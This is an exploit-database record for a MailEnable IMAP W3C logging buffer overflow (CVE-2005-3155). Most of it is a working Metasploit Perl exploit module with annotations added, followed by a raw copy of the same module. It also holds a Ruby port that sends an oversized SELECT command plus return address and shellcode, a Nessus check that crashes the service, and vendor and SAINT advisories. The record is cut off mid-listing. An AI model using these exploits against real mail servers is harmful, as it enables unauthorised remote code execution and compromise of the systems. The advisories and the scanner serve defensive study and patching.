MailEnable 1.54 Pro Universal IMAPD W3C Logging BoF Exploit
2005-11-20T00:00:00
ID EDB-ID:1332 Type exploitdb Reporter y0 Modified 2005-11-20T00:00:00
Description
MailEnable 1.54 Pro Universal IMAPD W3C Logging BoF Exploit. CVE-2005-3155. Remote exploit for the Windows platform.
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::mailenable_imap_w3c;
use strict;
use base 'Msf::Exploit';
use Msf::Socket::Tcp;
use Pex::Text;
# Advanced options: none for this module.
my $advanced = {
};

# Module metadata consumed by the Metasploit 2.x framework: option tables,
# payload constraints and the single target.
my $info = {
    'Name' => 'MailEnable IMAPD W3C Logging Buffer Overflow',
    'Version' => '$Revision: 1.1 $',
    'Authors' => [ 'y0 <y0 [at] w00t-shell.net>', ],
    'Arch' => [ 'x86' ],
    'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],
    # Privileged-module flag; what the framework derives from it is not
    # visible in this file.
    'Priv' => 1,
    'AutoOpts' =>
    {
        # Payload exit technique chosen on the operator's behalf.
        'EXITFUNC' => 'thread',
    },
    'UserOpts' =>
    {
        # Entry layout: [required, type, description, default].
        'RHOST' => [1, 'ADDR', 'The target address'],
        # RPORT is used by Exploit only; Check fingerprints the host through
        # the SMTP banner on port 25 instead.
        'RPORT' => [1, 'PORT', 'The target port', 143],
        # The overflow is only reachable after a successful LOGIN, so valid
        # credentials are mandatory.
        'USER' => [1, 'DATA', 'IMAP Username'],
        'PASS' => [1, 'DATA', 'IMAP Password'],
    },
    'Payload' =>
    {
        # Bytes placed ahead of the encoded payload: sub esp,0x4096 then
        # and sp,0xfff0 — lowers and 16-byte-aligns the stack pointer before
        # the payload runs.
        'Prepend' => "\x81\xec\x96\x40\x00\x00\x66\x81\xe4\xf0\xff",
        # Upper bound on the encoded payload size.
        'Space' => 600,
        # NUL, LF, CR and space: the payload travels inside a single IMAP
        # command line, so any of these would terminate or split the argument.
        'BadChars' => "\x00\x0a\x0d\x20",
        # Payload selection hint; presumably prefers payloads keyed 'ws2ord' —
        # verify against the framework's payload key list.
        'Keys' => ['+ws2ord'],
    },
    'Description' => Pex::Text::Freeform(qq{
This module exploits a buffer overflow in the W3C logging
functionality of the MailEnable IMAPD service. Logging is not
enabled by default and this exploit requires a valid username
and password to exploit the flaw. MailEnable Professional version
1.6 and prior and MailEnable Enterprise version 1.1 and prior are
affected.
}),
    'Refs' =>
    [
        # NOTE(review): only the Bugtraq id is listed; CVE-2005-3155 (named
        # in the advisory header) is not referenced here.
        ['BID', 15006],
    ],
    'Targets' =>
    [
        # [name, return address]; Exploit packs the address little-endian ('V').
        ['MailEnable 1.54 Pro Universal', 0x1001c019], #MEAISP.DLL
    ],
    # Module keyword used for search/categorisation.
    'Keys' => ['imap'],
};
# Construct the module object.
#
# Hands the shared Info/Advanced tables plus any caller-supplied arguments
# straight to the Msf::Exploit base constructor.
#
# Parameters: $class, followed by whatever the framework passes through.
# Returns: the object built by Msf::Exploit->new.
sub new {
    my ($class, @args) = @_;
    my $self = $class->SUPER::new(
        { 'Info' => $info, 'Advanced' => $advanced },
        @args,
    );
    return $self;
}
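# Fingerprint the target through its SMTP greeting.
#
# MailEnable's SMTP connector advertises the product version in its
# banner, which is why the check deliberately connects to port 25 and
# ignores RPORT. The original also read RPORT into an unused local;
# that has been dropped. The vendor hotfix does not change the banner
# (the Nessus plugin for this issue makes the same observation), so a
# match is a version hint, not proof that the flaw is present.
#
# Parameters: $self — the module instance (RHOST, CPORT, SSL are read).
# Returns: a CheckCode — 'Connect' when no socket could be opened,
#          'Safe' when the banner does not name version 0-1.54,
#          'Detected' when it does.
sub Check {
    my ($self) = @_;
    my $target_host = $self->GetVar('RHOST');

    my $s = Msf::Socket::Tcp->new(
        'PeerAddr'  => $target_host,
        'PeerPort'  => 25,
        'LocalPort' => $self->GetVar('CPORT'),
        'SSL'       => $self->GetVar('SSL'),
    );
    if ($s->IsError) {
        $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
        return $self->CheckCode('Connect');
    }

    # A bare QUIT is enough: the greeting line is what carries the version.
    $s->Send("QUIT\r\n");
    my $res = $s->Recv(-1, 20);
    $s->Close();

    # Recv may hand back undef on timeout or close; treat that as an empty
    # banner instead of matching a regex against undef.
    $res = '' unless defined $res;

    if ($res !~ /MailEnable Service, Version: 0-1\.54/) {
        $self->PrintLine("[*] This server does not appear to be vulnerable.");
        return $self->CheckCode('Safe');
    }

    $self->PrintLine("[*] Vulnerable installation detected :-)");
    return $self->CheckCode('Detected');
}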
# Drive the authenticated IMAP exchange that triggers the overflow.
#
# The statements form a strict request/response sequence (greeting,
# LOGIN, SELECT) and each step depends on the previous reply, so their
# order must not be changed. The overflow sits in the W3C logging path,
# so a server with logging disabled is unaffected (see the module
# Description).
#
# Parameters: $self — the module instance; RHOST, RPORT, TARGET, USER,
#             PASS and EncodedPayload are read through GetVar.
# Returns: nothing; progress and failures are reported via PrintLine.
sub Exploit {
    my $self = shift;

    my $targetHost = $self->GetVar('RHOST');
    my $targetPort = $self->GetVar('RPORT');
    my $targetIndex = $self->GetVar('TARGET');
    my $user = $self->GetVar('USER');
    my $pass = $self->GetVar('PASS');
    my $encodedPayload = $self->GetVar('EncodedPayload');
    # The framework supplies the payload already encoded — presumably
    # honouring the BadChars/Space constraints from $info.
    my $shellcode = $encodedPayload->Payload;
    # [name, return address] as declared in 'Targets'.
    my $target = $self->Targets->[$targetIndex];

    # NOTE(review): unlike Check, no CPORT/SSL options are passed here.
    my $sock = Msf::Socket::Tcp->new(
        'PeerAddr' => $targetHost,
        'PeerPort' => $targetPort,
    );
    if($sock->IsError) {
        $self->PrintLine('Error creating socket: ' . $sock->GetError);
        return;
    }

    my $resp = $sock->Recv(-1);
    chomp($resp);
    $self->PrintLine('[*] Got Banner: ' . $resp);

    # NOTE(review): USER/PASS are interpolated verbatim; a value containing
    # a space or CRLF would be read by the server as extra arguments or a
    # second command. Both come from the operator's options, not the network.
    my $sploit = "a01 LOGIN $user $pass\r\n";
    $sock->Send($sploit);
    # NOTE(review): $resp is re-declared with `my` here and again below.
    # Harmless because the file has no `use warnings`, but each declaration
    # masks the previous one.
    my $resp = $sock->Recv(-1);
    if($sock->IsError) {
        $self->PrintLine('Socket error: ' . $sock->GetError);
        return;
    }
    # The reply accepted as "logged in" is one starting "a01 BAD LOGIN-";
    # anything else is reported as a login error. Presumably a MailEnable
    # 1.x quirk — TODO confirm against the server's actual LOGIN reply.
    if($resp !~ /^a01 BAD LOGIN-/) {
        $self->PrintLine('Login error: ' . $resp);
        return;
    }
    $self->PrintLine('[*] Logged in, sending overflow');

    # Request layout: 6196 bytes of alphanumeric filler as the SELECT
    # mailbox argument, a 2-byte short jump, the target's return address
    # packed little-endian ('V'), then the encoded payload. The line is
    # CRLF-terminated like any IMAP command, which is why CR/LF/space are
    # BadChars.
    my $splat = Pex::Text::AlphaNumText(6196);
    $sploit =
        "a01 SELECT ". $splat.
        "\xeb\x06". pack('V', $target->[1]).
        $shellcode. "\r\n";

    $sock->Send($sploit);

    # A reply is taken as a sign the overflow did not take; silence is the
    # expected outcome. No IsError check follows this Recv, unlike the one
    # after LOGIN.
    my $resp = $sock->Recv(-1);
    if(length($resp)) {
        $self->PrintLine('[*] Got response, bad: ' . $resp);
    }

    # NOTE(review): the socket is never closed explicitly here, unlike in
    # Check; presumably it is released when $sock goes out of scope.
    return;
}
1; # a Perl module must end with a true value
# milw0rm.com [2005-11-20]
{"id": "EDB-ID:1332", "hash": "ace6583b6c0c8f195f6162aba837fb81", "type": "exploitdb", "bulletinFamily": "exploit", "title": "MailEnable 1.54 Pro Universal IMAPD W3C Logging BoF Exploit", "description": "MailEnable 1.54 Pro Universal IMAPD W3C Logging BoF Exploit. CVE-2005-3155. Remote exploit for windows platform", "published": "2005-11-20T00:00:00", "modified": "2005-11-20T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/1332/", "reporter": "y0", "references": [], "cvelist": ["CVE-2005-3155"], "lastseen": "2016-01-31T14:01:23", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-3155"]}, {"type": "osvdb", "idList": ["OSVDB:19842"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83006"]}, {"type": "saint", "idList": ["SAINT:7D568B6A44BCE5EC05156F69A6D8303C", "SAINT:E962BB565A40864787B48F196357F83F", "SAINT:A19B4FF9AC205F34D14BAB53A7F3A5C0"]}, {"type": "exploitdb", "idList": ["EDB-ID:16480"]}, {"type": "nessus", "idList": ["MAILENABLE_IMAP_LOGGING_OVERFLOW.NASL"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/IMAP/MAILENABLE_W3C_SELECT"]}], "modified": "2016-01-31T14:01:23"}, "vulnersScore": 7.2}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/1332/", "sourceData": "##\n# This file is part of the Metasploit Framework and may be redistributed\n# according to the licenses defined in the Authors field below. In the\n# case of an unknown or missing license, this file defaults to the same\n# license as the core Framework (dual GPLv2 and Artistic). 
The latest\n# version of the Framework can always be obtained from metasploit.com.\n##\n\npackage Msf::Exploit::mailenable_imap_w3c;\nuse strict;\nuse base 'Msf::Exploit';\nuse Msf::Socket::Tcp;\nuse Pex::Text;\n\nmy $advanced = {\n };\n\nmy $info = {\n\t'Name' => 'MailEnable IMAPD W3C Logging Buffer Overflow',\n\t'Version' => '$Revision: 1.1 $',\n\t'Authors' => [ 'y0 <y0 [at] w00t-shell.net>', ],\n\t'Arch' => [ 'x86' ],\n\t'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],\n\t'Priv' => 1,\n\t'AutoOpts' =>\n\t {\n\t\t'EXITFUNC' => 'thread',\n\t },\n\t'UserOpts' =>\n\t {\n\t\t'RHOST' => [1, 'ADDR', 'The target address'],\n\t\t'RPORT' => [1, 'PORT', 'The target port', 143],\n\t\t'USER' => [1, 'DATA', 'IMAP Username'],\n\t\t'PASS' => [1, 'DATA', 'IMAP Password'],\n\n\t },\n\t'Payload' =>\n\t {\n\t\t'Prepend' => \"\\x81\\xec\\x96\\x40\\x00\\x00\\x66\\x81\\xe4\\xf0\\xff\",\n\t\t'Space' => 600,\n\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x20\",\n\t\t'Keys' => ['+ws2ord'],\n\t },\n\t'Description' => Pex::Text::Freeform(qq{\n\t\tThis module exploits a buffer overflow in the W3C logging\n\tfunctionality of the MailEnable IMAPD service. Logging is not\n\tenabled by default and this exploit requires a valid username\n\tand password to exploit the flaw. MailEnable Professional version\n\t1.6 and prior and MailEnable Enterprise version 1.1 and prior are\n\taffected. 
\n}),\n\t'Refs' =>\n\t [\n\t\t['BID', 15006],\n\t ],\n\t'Targets' =>\n\t [\n\t\t['MailEnable 1.54 Pro Universal', 0x1001c019], #MEAISP.DLL\n\t ],\n\t'Keys' => ['imap'],\n };\n\nsub new {\n\tmy $class = shift;\n\tmy $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);\n\n\treturn($self);\n}\n\nsub Check {\n\tmy ($self) = @_;\n\tmy $target_host = $self->GetVar('RHOST');\n\tmy $target_port = $self->GetVar('RPORT');\n\n\tmy $s = Msf::Socket::Tcp->new\n\t (\n\t\t'PeerAddr' => $target_host,\n\t\t'PeerPort' => 25,\n\t\t'LocalPort' => $self->GetVar('CPORT'),\n\t\t'SSL' => $self->GetVar('SSL'),\n\t );\n\n\tif ($s->IsError) {\n\t\t$self->PrintLine('[*] Error creating socket: ' . $s->GetError);\n\t\treturn $self->CheckCode('Connect');\n\t}\n\n\t$s->Send(\"QUIT\\r\\n\");\n\tmy $res = $s->Recv(-1, 20);\n\t$s->Close();\n\n\tif ($res !~ /MailEnable Service, Version: 0-1\\.54/) {\n\t\t$self->PrintLine(\"[*] This server does not appear to be vulnerable.\");\n\t\treturn $self->CheckCode('Safe');\n\t}\n\n\t$self->PrintLine(\"[*] Vulnerable installation detected :-)\");\n\treturn $self->CheckCode('Detected');\n}\n\nsub Exploit {\n\tmy $self = shift;\n\n\tmy $targetHost = $self->GetVar('RHOST');\n\tmy $targetPort = $self->GetVar('RPORT');\n\tmy $targetIndex = $self->GetVar('TARGET');\n\tmy $user = $self->GetVar('USER');\n\tmy $pass = $self->GetVar('PASS');\n\tmy $encodedPayload = $self->GetVar('EncodedPayload');\n\tmy $shellcode = $encodedPayload->Payload;\n\tmy $target = $self->Targets->[$targetIndex];\n\n\tmy $sock = Msf::Socket::Tcp->new(\n\t\t'PeerAddr' => $targetHost,\n\t\t'PeerPort' => $targetPort,\n\t );\n\tif($sock->IsError) {\n\t\t$self->PrintLine('Error creating socket: ' . $sock->GetError);\n\t\treturn;\n\t}\n\n\tmy $resp = $sock->Recv(-1);\n\tchomp($resp);\n\t$self->PrintLine('[*] Got Banner: ' . 
$resp);\n\n\tmy $sploit = \"a01 LOGIN $user $pass\\r\\n\";\n\t$sock->Send($sploit);\n\tmy $resp = $sock->Recv(-1);\n\tif($sock->IsError) {\n\t\t$self->PrintLine('Socket error: ' . $sock->GetError);\n\t\treturn;\n\t}\n\tif($resp !~ /^a01 BAD LOGIN-/) {\n\t\t$self->PrintLine('Login error: ' . $resp);\n\t\treturn;\n\t}\n\t$self->PrintLine('[*] Logged in, sending overflow');\n\n\tmy $splat = Pex::Text::AlphaNumText(6196);\n\t$sploit =\n\t \"a01 SELECT \". $splat.\n\t \"\\xeb\\x06\". pack('V', $target->[1]).\n\t $shellcode. \"\\r\\n\";\n\n\t$sock->Send($sploit);\n\n\tmy $resp = $sock->Recv(-1);\n\tif(length($resp)) {\n\t\t$self->PrintLine('[*] Got response, bad: ' . $resp);\n\t}\n\n\treturn;\n\n}\n\n1;\n\n# milw0rm.com [2005-11-20]\n", "osvdbidlist": ["19842"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2016-09-03T05:51:45", "bulletinFamily": "NVD", "description": "Buffer overflow in the W3C logging for MailEnable Enterprise 1.1 and Professional 1.6 allows remote attackers to execute arbitrary code.", "modified": "2008-09-05T16:53:36", "published": "2005-10-05T19:02:00", "id": "CVE-2005-3155", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3155", "title": "CVE-2005-3155", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:16", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nSecurity Tracker: 1014999\n[Secunia Advisory ID:17010](https://secuniaresearch.flexerasoftware.com/advisories/17010/)\nOther Advisory URL: http://www.mailenable.com/hotfix/\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0179.html\nGeneric Exploit URL: http://www.securiteam.com/exploits/6Q00M0AEKQ.html\n[CVE-2005-3155](https://vulners.com/cve/CVE-2005-3155)\n", "modified": "2005-10-03T05:17:39", "published": "2005-10-03T05:17:39", "href": "https://vulners.com/osvdb/OSVDB:19842", "id": "OSVDB:19842", "title": "MailEnable W3C Logging Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:13:09", "bulletinFamily": "exploit", "description": "", "modified": "2009-11-26T00:00:00", "published": "2009-11-26T00:00:00", "href": "https://packetstormsecurity.com/files/83006/MailEnable-IMAPD-W3C-Logging-Buffer-Overflow.html", "id": "PACKETSTORM:83006", "type": "packetstorm", "title": "MailEnable IMAPD W3C Logging Buffer Overflow", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. 
Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Imap \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'MailEnable IMAPD W3C Logging Buffer Overflow', \n'Description' => %q{ \nThis module exploits a buffer overflow in the W3C logging \nfunctionality of the MailEnable IMAPD service. Logging is \nnot enabled by default and this exploit requires a valid \nusername and password to exploit the flaw. MailEnable \nProfessional version 1.6 and prior and MailEnable Enterprise \nversion 1.1 and prior are affected. \n \n}, \n'Author' => [ 'MC' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2005-3155'], \n[ 'OSVDB', '19842'], \n[ 'BID', '15006'], \n], \n'Privileged' => true, \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Payload' => \n{ \n'Space' => 600, \n'BadChars' => \"\\x00\\x0a\\x0d\\x20\", \n'StackAdjustment' => -3500, \n \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n['MailEnable 1.54 Pro Universal', { 'Ret' => 0x1001c019 } ] #MEAISP.DLL \n], \n'DisclosureDate' => '', \n'DefaultTarget' => 0)) \nend \n \ndef check \nconnect \ndisconnect \n \nif (banner and banner =~ /MailEnable Service, Version: 0-1\\.54/) \nreturn Exploit::CheckCode::Vulnerable \nend \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nconnect_login \n \nbuf = rand_text_alphanumeric(6196, payload_badchars) \nseh = generate_seh_payload(target.ret) \nreq = 'a01 SELECT ' + buf + seh + \"\\r\\n\" \nsock.put(req) \n \nhandler \ndisconnect \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/83006/mailenable_w3c_select.rb.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": 
"2019-01-16T20:06:19", "bulletinFamily": "scanner", "description": "The remote host is running a version of MailEnable's IMAP service\nthat is prone to a buffer overflow attack involving its handling of\nW3C logging. An attacker may be able to exploit this to execute\narbitrary code subject to the privileges of the affected application,\ntypically Administrator.", "modified": "2018-11-15T00:00:00", "published": "2005-10-04T00:00:00", "id": "MAILENABLE_IMAP_LOGGING_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=19783", "title": "MailEnable IMAP Server W3C Logging Overflow", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(19783);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/11/15 20:50:27\");\n\n script_cve_id(\"CVE-2005-3155\");\n script_bugtraq_id(15006);\n\n script_name(english:\"MailEnable IMAP Server W3C Logging Overflow\");\n script_summary(english:\"Checks for logging buffer overflow vulnerability in in MailEnable's IMAP service\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote IMAP server is prone to a buffer overflow attack.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of MailEnable's IMAP service\nthat is prone to a buffer overflow attack involving its handling of\nW3C logging. 
An attacker may be able to exploit this to execute\narbitrary code subject to the privileges of the affected application,\ntypically Administrator.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mailenable.com/forum/viewtopic.php?t=8555\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.mailenable.com/hotfix/\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the 3 October 2005 IMAP Rollup Critical Update/Performance\nImprovement Hotfix referenced in the vendor advisory above.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MailEnable IMAPD W3C Logging Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/10/04\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/10/03\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mailenable:mailenable\");\n script_end_attributes();\n\n script_category(ACT_MIXED_ATTACK);\n script_family(english:\"Windows\");\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_dependencie(\"smtpserver_detect.nasl\", \"imap4_banner.nasl\");\n script_exclude_keys(\"imap/false_imap\");\n script_require_ports(\"Services/smtp\", 25, \"Services/imap\", 143);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"imap_func.inc\");\ninclude(\"smtp_func.inc\");\n\n\nport = get_kb_item(\"Services/imap\");\nif (!port) port = 143;\nif (!get_port_state(port) || get_kb_item(\"imap/false_imap\")) 
exit(0);\n\n\n# Make sure the banner is for MailEnable.\nbanner = get_imap_banner(port:port);\nif (!banner || \"* OK IMAP4rev1 server ready\" >!< banner) exit(0);\n\n\n# If safe checks are enabled...\nif (safe_checks()) {\n # nb: we'll won't do a banner check unless report_paranoia is \n # set to paranoid since the hotfix doesn't update the banner.\n if (report_paranoia <= 1) exit(0);\n\n # Check the version number from the SMTP server's banner.\n smtp_port = get_kb_item(\"Services/smtp\");\n if (!smtp_port) smtp_port = 25;\n if (!get_port_state(smtp_port)) exit(0);\n if (get_kb_item('SMTP/'+smtp_port+'/broken')) exit(0);\n\n banner = get_smtp_banner(port:smtp_port);\n if (banner =~ \"Mail(Enable| Enable SMTP) Service\") {\n # nb: Standard Edition seems to format version as \"1.71--\" (for 1.71),\n # Professional Edition formats it like \"0-1.2-\" (for 1.2), and\n # Enterprise Edition formats it like \"0--1.1\" (for 1.1).\n ver = eregmatch(\n pattern:\"Version: (0-+)?([0-9][^- ]+)-*\",\n string:banner,\n icase:TRUE\n );\n if (ver == NULL) {\n exit(1, \"cannot determine version of MailEnable's SMTP connector service\");\n }\n if (ver[1] == NULL) {\n edition = \"Standard\";\n }\n else if (ver[1] == \"0-\") {\n edition = \"Professional\";\n }\n else if (ver[1] == \"0--\") {\n edition = \"Enterprise\";\n }\n if (isnull(edition)) {\n exit(1, \"cannot determine edition of MailEnable's SMTP connector service!\");\n }\n ver = ver[2];\n\n if (\n # nb: Professional versions <= 1.6 may be vulnerable.\n (edition == \"Professional\" && ver =~ \"^1\\.([0-5]|6$)\") ||\n # nb: Enterprise versions <= 1.2 may be vulnerable.\n (edition == \"Enterprise\" && ver =~ \"^1\\.(0|1$)\")\n ) {\n w = string(\n \"***** Nessus has determined the vulnerability exists on the remote\\n\",\n \"***** host simply by looking at the version number of Mailenable\\n\",\n \"***** installed there. 
Since the Hotfix does not change the version\\n\",\n \"***** number, though, this might be a false positive.\\n\");\n security_hole(port:port, extra: w);\n }\n }\n exit(0);\n}\n# Otherwise, try to exploit it.\nelse {\n # Establish a connection.\n tag = 0;\n soc = open_sock_tcp(port);\n if (!soc) exit(0);\n\n # Read banner.\n s = recv_line(socket:soc, length:1024);\n if (!strlen(s)) {\n close(soc);\n exit(0);\n }\n\n # Try to exploit the flaw.\n #\n # nb: a vulnerable server will respond with a bad command and die after a few seconds.\n ++tag;\n c = string(\"nessus\", string(tag), \" SELECT \", crap(6800));\n send(socket:soc, data:string(c, \"\\r\\n\"));\n close(soc);\n sleep(5);\n\n # Try to reestablish a connection and read the banner.\n soc2 = open_sock_tcp(port);\n if (soc2) s2 = recv_line(socket:soc2, length:1024);\n\n # There's a problem if we couldn't establish the connection or read the banner.\n if (!soc2 || !strlen(s2)) {\n security_hole(port);\n exit(0);\n }\n close(soc2);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "saint": [{"lastseen": "2016-10-03T15:01:59", "bulletinFamily": "exploit", "description": "Added: 12/03/2005 \nCVE: [CVE-2005-3155](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3155>) \nBID: [15006](<http://www.securityfocus.com/bid/15006>) \nOSVDB: [19842](<http://www.osvdb.org/19842>) \n\n\n### Background\n\n[MailEnable](<http://www.mailenable.com>) is a mail server for Windows platforms. The standard edition supports the SMTP and POP3 protocols. MailEnable Professional and MailEnable Enterprise also support IMAP and HTTPMail. \n\n### Problem\n\nMailEnable's IMAP service is affected by a buffer overflow condition in the handling of W3C logging. This could allow authenticated users to execute arbitrary commands. 
\n\n### Resolution\n\n[Upgrade](<http://www.mailenable.com/download.asp>) to MailEnable Professional 1.7 or MailEnable Enterprise 1.1 with all needed [hotfixes](<http://www.mailenable.com/hotfix>). \n\n### References\n\n<http://secunia.com/advisories/17010> \n\n\n### Limitations\n\nExploit works on MailEnable Professional 1.6. A valid IMAP user name and password are required. \n\n### Platforms\n\nWindows 2000 / Windows XP \nWindows Server 2003 \n \n\n", "modified": "2005-12-03T00:00:00", "published": "2005-12-03T00:00:00", "id": "SAINT:7D568B6A44BCE5EC05156F69A6D8303C", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/mailenable_imap_w3c_logging", "type": "saint", "title": "MailEnable IMAP W3C Logging Buffer Overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:08:21", "bulletinFamily": "exploit", "description": "Added: 12/03/2005 \nCVE: [CVE-2005-3155](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3155>) \nBID: [15006](<http://www.securityfocus.com/bid/15006>) \nOSVDB: [19842](<http://www.osvdb.org/19842>) \n\n\n### Background\n\n[MailEnable](<http://www.mailenable.com>) is a mail server for Windows platforms. The standard edition supports the SMTP and POP3 protocols. MailEnable Professional and MailEnable Enterprise also support IMAP and HTTPMail. \n\n### Problem\n\nMailEnable's IMAP service is affected by a buffer overflow condition in the handling of W3C logging. This could allow authenticated users to execute arbitrary commands. \n\n### Resolution\n\n[Upgrade](<http://www.mailenable.com/download.asp>) to MailEnable Professional 1.7 or MailEnable Enterprise 1.1 with all needed [hotfixes](<http://www.mailenable.com/hotfix>). \n\n### References\n\n<http://secunia.com/advisories/17010> \n\n\n### Limitations\n\nExploit works on MailEnable Professional 1.6. A valid IMAP user name and password are required. 
\n\n### Platforms\n\nWindows 2000 / Windows XP \nWindows Server 2003 \n \n\n", "modified": "2005-12-03T00:00:00", "published": "2005-12-03T00:00:00", "id": "SAINT:E962BB565A40864787B48F196357F83F", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/mailenable_imap_w3c_logging", "title": "MailEnable IMAP W3C Logging Buffer Overflow", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-14T16:58:05", "bulletinFamily": "exploit", "description": "Added: 12/03/2005 \nCVE: [CVE-2005-3155](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3155>) \nBID: [15006](<http://www.securityfocus.com/bid/15006>) \nOSVDB: [19842](<http://www.osvdb.org/19842>) \n\n\n### Background\n\n[MailEnable](<http://www.mailenable.com>) is a mail server for Windows platforms. The standard edition supports the SMTP and POP3 protocols. MailEnable Professional and MailEnable Enterprise also support IMAP and HTTPMail. \n\n### Problem\n\nMailEnable's IMAP service is affected by a buffer overflow condition in the handling of W3C logging. This could allow authenticated users to execute arbitrary commands. \n\n### Resolution\n\n[Upgrade](<http://www.mailenable.com/download.asp>) to MailEnable Professional 1.7 or MailEnable Enterprise 1.1 with all needed [hotfixes](<http://www.mailenable.com/hotfix>). \n\n### References\n\n<http://secunia.com/advisories/17010> \n\n\n### Limitations\n\nExploit works on MailEnable Professional 1.6. A valid IMAP user name and password are required. 
\n\n### Platforms\n\nWindows 2000 / Windows XP \nWindows Server 2003 \n \n\n", "modified": "2005-12-03T00:00:00", "published": "2005-12-03T00:00:00", "id": "SAINT:A19B4FF9AC205F34D14BAB53A7F3A5C0", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/mailenable_imap_w3c_logging", "type": "saint", "title": "MailEnable IMAP W3C Logging Buffer Overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-01T23:57:45", "bulletinFamily": "exploit", "description": "MailEnable IMAPD W3C Logging Buffer Overflow. CVE-2005-3155. Remote exploit for windows platform", "modified": "2010-06-15T00:00:00", "published": "2010-06-15T00:00:00", "id": "EDB-ID:16480", "href": "https://www.exploit-db.com/exploits/16480/", "type": "exploitdb", "title": "MailEnable IMAPD W3C Logging Buffer Overflow", "sourceData": "##\r\n# $Id: mailenable_w3c_select.rb 9525 2010-06-15 07:18:08Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing 